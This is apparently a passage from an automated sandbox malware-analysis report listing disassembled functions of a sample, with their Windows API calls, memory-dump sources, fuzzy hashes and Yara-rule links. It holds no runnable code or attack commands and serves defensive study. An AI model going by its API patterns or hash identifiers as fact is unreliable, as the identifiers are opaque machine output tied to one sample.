                                            Download Yara Rule
                                            APIs
                                            • CharLowerBuffW.USER32(?,?,?,?), ref: 00860587
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: BuffCharLower
                                            • String ID: cdecl$none$stdcall$winapi
                                            • API String ID: 2358735015-567219261
                                            • Opcode ID: 5e80eaabed561ffc81d685c85ecfbbeb27361c7c9d6293d316c4b4d3d8d965b2
                                            • Instruction ID: d953cfea0169d19000c292c9286721499c5d2786c37b27e29f7d6effbb34a967
                                            • Opcode Fuzzy Hash: 5e80eaabed561ffc81d685c85ecfbbeb27361c7c9d6293d316c4b4d3d8d965b2
                                            • Instruction Fuzzy Hash: A8318D7050021AAFCF10EF98CC529EFB3B8FF55314B108629E826E76D2DB71A955CB90
                                            Function 0083B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0083B88E
                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0083B8A1
                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 0083B8D1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID: ComboBox$ListBox
                                            • API String ID: 3850602802-1403004172
                                            • Opcode ID: aca9fff6975db44b4f7f317bb2e5e072aeb47259196729784b011fac47d6f455
                                            • Instruction ID: 9848af6ee8008822287bc13eff6cf081b0ff95dc3f601574b087e6b5d3b87634
                                            • Opcode Fuzzy Hash: aca9fff6975db44b4f7f317bb2e5e072aeb47259196729784b011fac47d6f455
                                            • Instruction Fuzzy Hash: F721A0B1A00208AEDB04AB68DC96DFE777CFF85354F104229F521E62E1DB68490697A0
                                            Function 008543E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00854401
                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00854427
                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00854457
                                            • InternetCloseHandle.WININET(00000000), ref: 0085449E
                                              • Part of subcall function 00855052: GetLastError.KERNEL32(?,?,008543CC,00000000,00000000,00000001), ref: 00855067
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                            • String ID:
                                            • API String ID: 1951874230-3916222277
                                            • Opcode ID: 9df5182e4db231474f261118e87f04d6b9da9334746cc12a011e24589abf220c
                                            • Instruction ID: 6532c3ce4be09ca2c9f96e6770aef440ca5cc26ea1bef4c32e04c4d2ce7cd273
                                            • Opcode Fuzzy Hash: 9df5182e4db231474f261118e87f04d6b9da9334746cc12a011e24589abf220c
                                            • Instruction Fuzzy Hash: 4521DEB2140208BFE711AF58CC84EBFB7ECFB4875AF10901AF909E2180EA648D499775
                                            Function 008690E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0081D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0081D1BA
                                              • Part of subcall function 0081D17C: GetStockObject.GDI32(00000011), ref: 0081D1CE
                                              • Part of subcall function 0081D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0081D1D8
                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0086915C
                                            • LoadLibraryW.KERNEL32(?), ref: 00869163
                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00869178
                                            • DestroyWindow.USER32(?), ref: 00869180
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                            • String ID: SysAnimate32
                                            • API String ID: 4146253029-1011021900
                                            • Opcode ID: a37c2679f266517c408f3c0ff62ea5d04939f49bb6aea87029652b563c04a15f
                                            • Instruction ID: cc10a11cf24266cc7673b57bbe5f08e9c0a03b34e5ef7dc4a2cd22a570a3c330
                                            • Opcode Fuzzy Hash: a37c2679f266517c408f3c0ff62ea5d04939f49bb6aea87029652b563c04a15f
                                            • Instruction Fuzzy Hash: DE219F7120020ABBEF104F68DC89EBA37ADFF9A364F220618F994D61D0D735DC41A760
                                            Function 00849568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetStdHandle.KERNEL32(0000000C), ref: 00849588
                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008495B9
                                            • GetStdHandle.KERNEL32(0000000C), ref: 008495CB
                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00849605
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CreateHandle$FilePipe
                                            • String ID: nul
                                            • API String ID: 4209266947-2873401336
                                            • Opcode ID: 53eb995cea85f5626aa596402735035472382105587c3e8cf814c2cb90c21c7b
                                            • Instruction ID: 742235edfc3b54ad6a9b3dbfea4361a6b859cb184ea6e7b37bd9f2d3ee2dfd0a
                                            • Opcode Fuzzy Hash: 53eb995cea85f5626aa596402735035472382105587c3e8cf814c2cb90c21c7b
                                            • Instruction Fuzzy Hash: F0213970600309ABEB219F29DC45A9BBBB8FF95724F214A19F9A1D72D0D770E941CB20
                                            Function 00849634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetStdHandle.KERNEL32(000000F6), ref: 00849653
                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00849683
                                            • GetStdHandle.KERNEL32(000000F6), ref: 00849694
                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 008496CE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CreateHandle$FilePipe
                                            • String ID: nul
                                            • API String ID: 4209266947-2873401336
                                            • Opcode ID: 73e9a04c3c92c3e3123922e3c871d2ea6c979d903ac9514e9721fe15fbb2da21
                                            • Instruction ID: c6342830f4a33700e5dfc516ecebf71d0e02363dd13d1b7e8b8b734dd0ca3a65
                                            • Opcode Fuzzy Hash: 73e9a04c3c92c3e3123922e3c871d2ea6c979d903ac9514e9721fe15fbb2da21
                                            • Instruction Fuzzy Hash: BB212A716003099BDB309F699C45E9BB7A8FFA5734F210A19E8E1E72D0E7709C41CB55
                                            Function 0084DAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetErrorMode.KERNEL32(00000001), ref: 0084DB0A
                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0084DB5E
                                            • __swprintf.LIBCMT ref: 0084DB77
                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,0089DC00), ref: 0084DBB5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ErrorMode$InformationVolume__swprintf
                                            • String ID: %lu
                                            • API String ID: 3164766367-685833217
                                            • Opcode ID: 4676aff359f2881e322cae6bda91075c26d4347c93a18fc1af52d573c500c970
                                            • Instruction ID: e03b1cab7aa14c216a605ee7aae1b61b1b1b54aa48f886bdd87157193449d36a
                                            • Opcode Fuzzy Hash: 4676aff359f2881e322cae6bda91075c26d4347c93a18fc1af52d573c500c970
                                            • Instruction Fuzzy Hash: A4215335600208AFCB10EFA8DD85DAEBBB8FF89714B104069F905E7391DB71EA41CB61
                                            Function 0083C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0083C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0083C84A
                                              • Part of subcall function 0083C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0083C85D
                                              • Part of subcall function 0083C82D: GetCurrentThreadId.KERNEL32 ref: 0083C864
                                              • Part of subcall function 0083C82D: AttachThreadInput.USER32(00000000), ref: 0083C86B
                                            • GetFocus.USER32 ref: 0083CA05
                                              • Part of subcall function 0083C876: GetParent.USER32(?), ref: 0083C884
                                            • GetClassNameW.USER32(?,?,00000100), ref: 0083CA4E
                                            • EnumChildWindows.USER32(?,0083CAC4), ref: 0083CA76
                                            • __swprintf.LIBCMT ref: 0083CA90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                            • String ID: %s%d
                                            • API String ID: 3187004680-1110647743
                                            • Opcode ID: f825e70fb11aa83a1dc9586957c42ab5a5cfeba70fb192a6eadc56ec4061e467
                                            • Instruction ID: 89649b88118a14d60a843b186de9b645c32b1cdd2a4e6de33ee1aa6045a58a5f
                                            • Opcode Fuzzy Hash: f825e70fb11aa83a1dc9586957c42ab5a5cfeba70fb192a6eadc56ec4061e467
                                            • Instruction Fuzzy Hash: B111A2B16002196BCF11BF689C85FA93778FF84714F008066FA19FA182DB749645CBB1
                                            Function 00861945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                            Download Yara Rule
                                            APIs
                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 008619F3
                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00861A26
                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00861B49
                                            • CloseHandle.KERNEL32(?), ref: 00861BBF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                            • String ID:
                                            • API String ID: 2364364464-0
                                            • Opcode ID: b28c23f640a0d280b224ac47fe3c250fee402b3a5fd268b490eb6e6597ce017f
                                            • Instruction ID: 812fc69f671bcb0ac5d8176d2d83383dd9eaeecee7a9cf57bceea7c02f201c8f
                                            • Opcode Fuzzy Hash: b28c23f640a0d280b224ac47fe3c250fee402b3a5fd268b490eb6e6597ce017f
                                            • Instruction Fuzzy Hash: E3815470600214ABDF10DF68C89ABADBBE9FF04720F198459F905EF3D2D7B5A9418B91
                                            Function 0086E062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0086E1D5
                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0086E20D
                                            • IsDlgButtonChecked.USER32(?,00000001), ref: 0086E248
                                            • GetWindowLongW.USER32(?,000000EC), ref: 0086E269
                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0086E281
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend$ButtonCheckedLongWindow
                                            • String ID:
                                            • API String ID: 3188977179-0
                                            • Opcode ID: fbb1414b0cf22402c6833419ed13d6d659e34dae733957329a8972721a681bae
                                            • Instruction ID: b1f34bc8e45bebc465fa1995c34621d0403817540445de168d7517644653a963
                                            • Opcode Fuzzy Hash: fbb1414b0cf22402c6833419ed13d6d659e34dae733957329a8972721a681bae
                                            • Instruction Fuzzy Hash: DC61C138A00608AFDB21CF58C895FAA77BAFF9A300F164059F959D73A1C770A951DB11
                                            Function 00841C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                            Download Yara Rule
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 00841CB4
                                            • VariantClear.OLEAUT32(00000013), ref: 00841D26
                                            • VariantClear.OLEAUT32(00000000), ref: 00841D81
                                            • VariantClear.OLEAUT32(?), ref: 00841DF8
                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00841E26
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Variant$Clear$ChangeInitType
                                            • String ID:
                                            • API String ID: 4136290138-0
                                            • Opcode ID: b41555565d637113ccdcbb2865293a400663ed488f4b921812730b98e19de009
                                            • Instruction ID: 77886ccef1d0afa2c44a227dd547aa052a33cb3af2e1080c67d0affb9ffe9fa7
                                            • Opcode Fuzzy Hash: b41555565d637113ccdcbb2865293a400663ed488f4b921812730b98e19de009
                                            • Instruction Fuzzy Hash: 495126B5A00209AFDF14CF58C884AAAB7B9FF8C314B158559ED59DB341E730EA51CFA0
                                            Function 00860688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0080936C: __swprintf.LIBCMT ref: 008093AB
                                              • Part of subcall function 0080936C: __itow.LIBCMT ref: 008093DF
                                            • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 008606EE
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0086077D
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0086079B
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 008607E1
                                            • FreeLibrary.KERNEL32(00000000,00000004), ref: 008607FB
                                              • Part of subcall function 0081E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0084A574,?,?,00000000,00000008), ref: 0081E675
                                              • Part of subcall function 0081E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0084A574,?,?,00000000,00000008), ref: 0081E699
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                            • String ID:
                                            • API String ID: 327935632-0
                                            • Opcode ID: 77982014d4630d9fc095eb358675f90cad1b6dedfe77059338b4ae8d4b1c1f65
                                            • Instruction ID: 5a7c0148dce4ae11b77ee2c0444ad588fc479851bf584ce768dd20b210645eb7
                                            • Opcode Fuzzy Hash: 77982014d4630d9fc095eb358675f90cad1b6dedfe77059338b4ae8d4b1c1f65
                                            • Instruction Fuzzy Hash: 0E514775A00209DFCB04EFA8C8859AEB7B5FF18310B058069E946EB392DB30ED45CF85
                                            Function 00862E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00863C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00862BB5,?,?), ref: 00863C1D
                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00862EEF
                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00862F2E
                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00862F75
                                            • RegCloseKey.ADVAPI32(?,?), ref: 00862FA1
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00862FAE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                            • String ID:
                                            • API String ID: 3740051246-0
                                            • Opcode ID: 4cac37e534f595f2ccdf728f432f2547e0c3ee701e2685f9e199ca883d1f59dd
                                            • Instruction ID: a92aac82fa9f6679d2438110d77ba1b1b87a60299795c5a941a39e196bda9fe8
                                            • Opcode Fuzzy Hash: 4cac37e534f595f2ccdf728f432f2547e0c3ee701e2685f9e199ca883d1f59dd
                                            • Instruction Fuzzy Hash: 14514471208304AFC754EF68CC91E6AB7E9FF88314F00896DB595D72A1DB70E904CB52
                                            Function 0086CCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 52f5f4f9020a8e0999c134146521072a7b1be18c1204bef2b9d7960dc922fb28
                                            • Instruction ID: 0b67fa8b2a31c9e258d72a8a8d009abafe6100c6cffa9fb7551ed28a228ba74d
                                            • Opcode Fuzzy Hash: 52f5f4f9020a8e0999c134146521072a7b1be18c1204bef2b9d7960dc922fb28
                                            • Instruction Fuzzy Hash: 68418079900208AFDB20DF68CC48FB9BB78FB09314F160265E999E72E1D771AD519B90
                                            Function 00851206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 008512B4
                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 008512DD
                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0085131C
                                              • Part of subcall function 0080936C: __swprintf.LIBCMT ref: 008093AB
                                              • Part of subcall function 0080936C: __itow.LIBCMT ref: 008093DF
                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00851341
                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00851349
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                            • String ID:
                                            • API String ID: 1389676194-0
                                            • Opcode ID: 7713ded68f5eb51d4394477d6dabf2b5deaa61a0f1f2ed1234b60ac374f7316e
                                            • Instruction ID: be7e70e2358c9c14302d28e2e1c3bf37ae9eae375e5400c1db398c6bbf934fd9
                                            • Opcode Fuzzy Hash: 7713ded68f5eb51d4394477d6dabf2b5deaa61a0f1f2ed1234b60ac374f7316e
                                            • Instruction Fuzzy Hash: 464108356002059FCB01EF68C991AAEBBF5FF08310B148095E94AAB3A2DB31ED41CB51
                                            Function 0083B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetWindowRect.USER32(?,?), ref: 0083B369
                                            • PostMessageW.USER32(?,00000201,00000001), ref: 0083B413
                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0083B41B
                                            • PostMessageW.USER32(?,00000202,00000000), ref: 0083B429
                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0083B431
                                            Memory Dump Source
